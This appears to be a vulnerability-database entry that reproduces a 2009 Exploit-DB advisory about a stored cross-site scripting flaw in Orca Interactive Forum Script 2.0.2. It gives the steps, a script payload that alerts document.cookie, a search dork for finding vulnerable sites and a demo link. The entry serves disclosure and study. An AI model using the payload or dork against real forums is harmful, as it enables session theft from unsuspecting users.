Orca-v.2.0.2 Xss

vendor:

Orca Interactive Forum Script

by:

J-Hacker || Jerusalem Hacker

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Orca Interactive Forum Script

Affected Version From: 2.0.2

Affected Version To: 2.0.2

Patch Exists: NO

Related CWE: N/A

CPE: a:boonex:orca_interactive_forum_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A Cross-Site Scripting (XSS) vulnerability was discovered in Orca-v.2.0.2. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application. This code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent Cross-Site Scripting (XSS) attacks.

Source

Exploit-DB raw data:

--------------------------------------------------------------------------\
[+]  Script : Orca-v.2.0.2
[+]  Bug: Xss
[+]  By: J-Hacker || Jerusalem Hacker || From : soqor.net
[+]  Email : M0t4z@hotmail.com
[+]  Download : http://www.boonex.com/thankyou.php?p=Orca-v.2.0
[+]  D0rk :Powered by Orca Interactive Forum Script. Copyright 2008 My Company
--------------------------------------------------------------------------
First you must login then write new topic
write in the topic
 "><script>alert(document.cookie)</script>
demo: http://www.demozzz.com/orca/demo/?action=goto&topic_id=test--2009-01-30#topic/-script-alert-document-cookie-script-.htm
--------------------------------------------------------------------------
[+] Greetz : HACKERS PAL , Sp1d3r_Net , Mr.5rab , Dr.CriMiNAL SyRiA , And All soqor.net members
[+] http://WwW.SoQoR.NeT
--------------------------------------------------------------------------/

# milw0rm.com [2009-01-30]